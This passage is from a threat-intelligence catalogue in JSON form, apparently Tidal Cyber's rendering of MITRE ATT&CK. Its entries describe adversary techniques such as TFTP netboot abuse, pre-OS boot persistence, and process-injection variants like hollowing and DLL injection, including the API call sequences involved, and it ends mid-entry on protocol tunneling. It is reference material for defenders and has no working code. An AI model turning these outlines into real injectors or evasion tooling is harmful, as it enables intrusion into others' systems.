"description": "Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.\n\nAdversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://app.tidalcyber.com/technique/b9d60848-388e-444c-9f22-2267ea61b5e9) and may result in the network device running a modified image. <sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1542.005"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "6f2186f3-c798-46e8-a26f-ae033822837b",
"value": "TFTP Boot"
},
{
"description": "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.<sup>[[Wikipedia Booting](https://app.tidalcyber.com/references/6d9c72cb-6cda-445e-89ea-7e695063d49a)]</sup>\n\nAdversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "032985de-5e09-4889-b8c4-84d940c6346c",
"type": "similar"
},
{
"dest-uuid": "764041d4-ff10-45d0-b42e-2f23ca334740",
"type": "similar"
},
{
"dest-uuid": "b9d60848-388e-444c-9f22-2267ea61b5e9",
"type": "similar"
},
{
"dest-uuid": "4050dbda-5cb0-4bd6-8444-841e55611f3a",
"type": "similar"
},
{
"dest-uuid": "6f2186f3-c798-46e8-a26f-ae033822837b",
"type": "similar"
}
],
"uuid": "33cd26b0-0248-4ee2-97a6-aab6a79824af",
"value": "Pre-OS Boot"
},
{
"description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://app.tidalcyber.com/technique/710ae610-0556-44e5-9de9-8be6159a23dd) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://app.tidalcyber.com/software/abae8f19-9497-4a71-82b6-ae6edd26ad98) utility via [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) or <code>Get-Process</code> via [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde). Information about processes can also be extracted from the output of [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) calls such as <code>CreateToolhelp32Snapshot</code>. In Mac and Linux, this is accomplished with the <code>ps</code> command. Adversaries may also opt to enumerate processes via /proc.\n\nOn network devices, [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `show processes` can be used to display current running processes.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[show_processes_cisco_cmd](https://app.tidalcyber.com/references/944e529b-5e8a-54a1-b205-71dcb7dd304f)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "710ae610-0556-44e5-9de9-8be6159a23dd",
"value": "Process Discovery"
},
{
"description": "Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. \n\nAPC injection is commonly performed by attaching malicious code to the APC Queue <sup>[[Microsoft APC](https://app.tidalcyber.com/references/37f1ef6c-fc0e-4e47-85ab-20d53caba77e)]</sup> of a process's thread. Queued APC functions are executed when the thread enters an alterable state.<sup>[[Microsoft APC](https://app.tidalcyber.com/references/37f1ef6c-fc0e-4e47-85ab-20d53caba77e)]</sup> A handle to an existing victim process is first created with native Windows API calls such as <code>OpenThread</code>. At this point <code>QueueUserAPC</code> can be used to invoke a function (such as <code>LoadLibrayA</code> pointing to a malicious DLL). \n\nA variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. <sup>[[CyberBit Early Bird Apr 2018](https://app.tidalcyber.com/references/8ae4ec67-518e-46dd-872c-7e2a9ca4ef13)]</sup> AtomBombing <sup>[[ENSIL AtomBombing Oct 2016](https://app.tidalcyber.com/references/9282dbab-391c-4ffd-ada9-1687413b686b)]</sup> is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.<sup>[[Microsoft Atom Table](https://app.tidalcyber.com/references/a22636c8-8e39-4583-93ef-f0b7f0a218d8)]</sup>\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1055.004"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "abccbb2a-2ea8-43b8-95dc-c583df300c07",
"value": "Asynchronous Procedure Call"
},
{
"description": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. \n\nDLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> (which calls the <code>LoadLibrary</code> API responsible for loading the DLL). <sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup> \n\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of <code>LoadLibrary</code>).<sup>[[Elastic HuntingNMemory June 2017](https://app.tidalcyber.com/references/8cd58716-4ff1-4ba2-b980-32c52cf7dee8)]</sup><sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup> \n\nAnother variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module's <code>AddressOfEntryPoint</code> before starting a new thread in the target process.<sup>[[Module Stomping for Shellcode Injection](https://app.tidalcyber.com/references/0f9b58e2-2a81-4b79-aad6-b36a844cf1c6)]</sup> This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.<sup>[[Hiding Malicious Code with Module Stomping](https://app.tidalcyber.com/references/88983d22-980d-4442-858a-3b70ec485b94)]</sup> \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1055.001"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "232bb95b-a267-4cc2-8eb1-67ecdd5babd5",
"value": "Dynamic-link Library Injection"
},
{
"description": "Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. \n\nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).<sup>[[Microsoft Window Classes](https://app.tidalcyber.com/references/cc620fcd-1f4a-4670-84b5-3f12c9b85053)]</sup> Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. <sup>[[Microsoft GetWindowLong function](https://app.tidalcyber.com/references/4366217a-2325-4056-ab68-f5f4d2a0703c)]</sup> <sup>[[Microsoft SetWindowLong function](https://app.tidalcyber.com/references/11755d06-a9df-4a19-a165-2995f25c4b12)]</sup>\n\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the processs memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the processs EWM.\n\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as <code>WriteProcessMemory</code> and <code>CreateRemoteThread</code>.<sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup> More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. <sup>[[MalwareTech Power Loader Aug 2013](https://app.tidalcyber.com/references/9a9a6ca1-d7c5-4385-924b-cdeffd66602e)]</sup> <sup>[[WeLiveSecurity Gapz and Redyms Mar 2013](https://app.tidalcyber.com/references/b8d328b7-2eb3-4851-8d44-2e1bad7710c2)]</sup>\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1055.011"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "43d872bd-3d54-4ea3-bc89-a2f979db0d5a",
"value": "Extra Window Memory Injection"
},
{
"description": "Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.\n\nList-view controls are user interface windows used to display collections of items.<sup>[[Microsoft List View Controls](https://app.tidalcyber.com/references/7d6c6ba6-cda6-4f27-bfc8-af5b759305ed)]</sup> Information about an application's list-view settings are stored within the process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a form of message-passing \"shatter attack\") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.<sup>[[Modexp Windows Process Injection](https://app.tidalcyber.com/references/1bf45166-bfce-450e-87d1-b1e3b19fdb62)]</sup> Adversaries must first copy code into the target process memory space, which can be performed various ways including by directly obtaining a handle to the <code>SysListView32</code> child of the victim process window (via Windows API calls such as <code>FindWindow</code> and/or <code>EnumWindows</code>) or other [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) methods.\n\nSome variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored <code>WriteProcessMemory</code> function. For example, an adversary can use the <code>PostMessage</code> and/or <code>SendMessage</code> API functions to send <code>LVM_SETITEMPOSITION</code> and <code>LVM_GETITEMPOSITION</code> messages, effectively copying a payload 2 bytes at a time to the allocated memory.<sup>[[ESET InvisiMole June 2020](https://app.tidalcyber.com/references/d10cfda8-8fd8-4ada-8c61-dba6065b0bac)]</sup> \n\nFinally, the payload is triggered by sending the <code>LVM_SORTITEMS</code> message to the <code>SysListView32</code> child of the process window, with the payload within the newly allocated buffer passed and executed as the <code>ListView_SortItems</code> callback.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1055.015"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "c262a10e-13db-4c47-995c-87201cdf858d",
"value": "ListPlanting"
},
{
"description": "Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. <sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup> \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1055.002"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "2afcdcd1-ce55-4837-a84d-8279bc10f948",
"value": "Portable Executable Injection"
},
{
"description": "Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. \n\nWindows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. <sup>[[Microsoft TxF](https://app.tidalcyber.com/references/f7f2eecc-19e6-4d93-8a53-91afea2f242e)]</sup> To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. <sup>[[Microsoft Basic TxF Concepts](https://app.tidalcyber.com/references/72798536-a7e3-43e2-84e3-b5b8b54f0bca)]</sup> To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. <sup>[[Microsoft Where to use TxF](https://app.tidalcyber.com/references/f315072c-67cb-4166-aa18-8e92e00ef7e8)]</sup>\n\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. <sup>[[BlackHat Process Doppelgänging Dec 2017](https://app.tidalcyber.com/references/b0752c3a-1777-4209-938d-5382de6a49f5)]</sup>\n\nAdversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e). Similar to [Process Hollowing](https://app.tidalcyber.com/technique/77100337-67a1-4520-b25a-3ddd72b0d5ac), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as <code>NtUnmapViewOfSection</code>, <code>VirtualProtectEx</code>, and <code>SetThreadContext</code>. <sup>[[BlackHat Process Doppelgänging Dec 2017](https://app.tidalcyber.com/references/b0752c3a-1777-4209-938d-5382de6a49f5)]</sup>\n\nProcess Doppelgänging is implemented in 4 steps <sup>[[BlackHat Process Doppelgänging Dec 2017](https://app.tidalcyber.com/references/b0752c3a-1777-4209-938d-5382de6a49f5)]</sup>:\n\n* Transact Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\n* Load Create a shared section of memory and load the malicious executable.\n* Rollback Undo changes to original executable, effectively removing malicious code from the file system.\n* Animate Create a process from the tainted section of memory and initiate execution.\n\nThis behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1055.013"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "5b841b56-6b47-4cec-bf80-71a9a51fa7a0",
"value": "Process Doppelgänging"
},
{
"description": "Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process. \n\nProcess hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as <code>CreateProcess</code>, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as <code>ZwUnmapViewOfSection</code> or <code>NtUnmapViewOfSection</code> before being written to, realigned to the injected code, and resumed via <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.<sup>[[Leitch Hollowing](https://app.tidalcyber.com/references/8feb180a-bfad-42cb-b8ee-792c5088567a)]</sup><sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>\n\nThis is very similar to [Thread Local Storage](https://app.tidalcyber.com/technique/24e0b530-cca7-4c5c-83b2-97b83c716e42) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1055.012"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "77100337-67a1-4520-b25a-3ddd72b0d5ac",
"value": "Process Hollowing"
},
{
"description": "Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. \n\nProc memory injection involves enumerating the memory of a process via the /proc filesystem (<code>/proc/[pid]</code>) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes memory map within <code>/proc/[pid]/maps</code> can be overwritten using dd.<sup>[[Uninformed Needle](https://app.tidalcyber.com/references/5ac2d917-756f-48d0-ab32-648b45a29083)]</sup><sup>[[GDS Linux Injection](https://app.tidalcyber.com/references/3e7f5991-25b4-43e9-9f0b-a5c668fb0657)]</sup><sup>[[DD Man](https://app.tidalcyber.com/references/f64bee0d-e37d-45d5-9968-58e622e89bfe)]</sup> \n\nOther techniques such as [Dynamic Linker Hijacking](https://app.tidalcyber.com/technique/b0d884c3-cf87-4610-992d-4ec54c667759) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://app.tidalcyber.com/technique/77100337-67a1-4520-b25a-3ddd72b0d5ac), proc memory injection may target child processes (such as a backgrounded copy of sleep).<sup>[[GDS Linux Injection](https://app.tidalcyber.com/references/3e7f5991-25b4-43e9-9f0b-a5c668fb0657)]</sup> \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1055.009"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "7360117a-3404-48d0-9d4b-7f6a61c08f0e",
"value": "Proc Memory"
},
{
"description": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPtrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.<sup>[[PTRACE man](https://app.tidalcyber.com/references/fc5e63e7-090a-441b-8e34-9946e1840b49)]</sup> Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: <code>malloc</code>) then invoking that memory with <code>PTRACE_SETREGS</code> to set the register containing the next instruction to execute. Ptrace system call injection can also be done with <code>PTRACE_POKETEXT</code>/<code>PTRACE_POKEDATA</code>, which copy data to a specific address in the target processes memory (ex: the current address of the next instruction). <sup>[[PTRACE man](https://app.tidalcyber.com/references/fc5e63e7-090a-441b-8e34-9946e1840b49)]</sup><sup>[[Medium Ptrace JUL 2018](https://app.tidalcyber.com/references/6dbfe4b5-9430-431b-927e-e8e775874cd9)]</sup> \n\nPtrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.<sup>[[BH Linux Inject](https://app.tidalcyber.com/references/bdbb2a83-fc3b-439f-896a-75bffada4d51)]</sup> \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1055.008"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "e200d4c9-2d9c-4303-a2de-86baae85c60f",
"value": "Ptrace System Calls"
},
{
"description": "Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nThread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as <code>OpenThread</code>. At this point the process can be suspended then written to, realigned to the injected code, and resumed via <code>SuspendThread </code>, <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.<sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>\n\nThis is very similar to [Process Hollowing](https://app.tidalcyber.com/technique/77100337-67a1-4520-b25a-3ddd72b0d5ac) but targets an existing process rather than creating a process in a suspended state. \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1055.003"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "8e332106-dd58-4adc-927d-57d038af797c",
"value": "Thread Execution Hijacking"
},
{
"description": "Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. \n\nTLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process memory space using other [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) techniques such as [Process Hollowing](https://app.tidalcyber.com/technique/77100337-67a1-4520-b25a-3ddd72b0d5ac).<sup>[[FireEye TLS Nov 2017](https://app.tidalcyber.com/references/9737055a-f583-448e-84d0-1d336c4da9a8)]</sup>\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1055.005"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "24e0b530-cca7-4c5c-83b2-97b83c716e42",
"value": "Thread Local Storage"
},
{
"description": "Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nVDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://app.tidalcyber.com/technique/e200d4c9-2d9c-4303-a2de-86baae85c60f). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).<sup>[[ELF Injection May 2009](https://app.tidalcyber.com/references/3ca314d4-3fcf-4545-8ae9-4d8781d51295)]</sup><sup>[[Backtrace VDSO](https://app.tidalcyber.com/references/1c8fa804-6579-4e68-a0b3-d16e0bee5654)]</sup><sup>[[VDSO Aug 2005](https://app.tidalcyber.com/references/ae70f799-ebb6-4ffe-898e-945cb754c1cb)]</sup><sup>[[Syscall 2014](https://app.tidalcyber.com/references/4e8fe849-ab1a-4c51-b5eb-16fcd10e8bd0)]</sup>\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1055.014"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "f060dcca-e7d2-4711-b5d1-41cffcb731b0",
"value": "VDSO Hijacking"
},
{
"description": "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. \n\nThere are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. \n\nMore sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. ",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "abccbb2a-2ea8-43b8-95dc-c583df300c07",
"type": "similar"
},
{
"dest-uuid": "232bb95b-a267-4cc2-8eb1-67ecdd5babd5",
"type": "similar"
},
{
"dest-uuid": "43d872bd-3d54-4ea3-bc89-a2f979db0d5a",
"type": "similar"
},
{
"dest-uuid": "c262a10e-13db-4c47-995c-87201cdf858d",
"type": "similar"
},
{
"dest-uuid": "2afcdcd1-ce55-4837-a84d-8279bc10f948",
"type": "similar"
},
{
"dest-uuid": "5b841b56-6b47-4cec-bf80-71a9a51fa7a0",
"type": "similar"
},
{
"dest-uuid": "77100337-67a1-4520-b25a-3ddd72b0d5ac",
"type": "similar"
},
{
"dest-uuid": "7360117a-3404-48d0-9d4b-7f6a61c08f0e",
"type": "similar"
},
{
"dest-uuid": "e200d4c9-2d9c-4303-a2de-86baae85c60f",
"type": "similar"
},
{
"dest-uuid": "8e332106-dd58-4adc-927d-57d038af797c",
"type": "similar"
},
{
"dest-uuid": "24e0b530-cca7-4c5c-83b2-97b83c716e42",
"type": "similar"
},
{
"dest-uuid": "f060dcca-e7d2-4711-b5d1-41cffcb731b0",
"type": "similar"
}
],
"uuid": "7a6208ac-c75e-4e73-8969-0aaf6085cb6e",
"value": "Process Injection"
},
{
"description": "Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. \n\nThere are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.<sup>[[SSH Tunneling](https://app.tidalcyber.com/references/13280f38-0f17-42d3-9f92-693f1da60ffa)]</sup> \n\n[Protocol Tunneling](https://app.tidalcyber.com/technique/bd677092-d197-4230-b94a-438cb24260fd) may also be abused by adversaries during [Dynamic Resolution](https://app.tidalcyber.com/technique/987ad3da-9423-4fe0-a52b-b931c0b8b95f). Known as DNS over HTTPS (DoH), queries to resolve C2 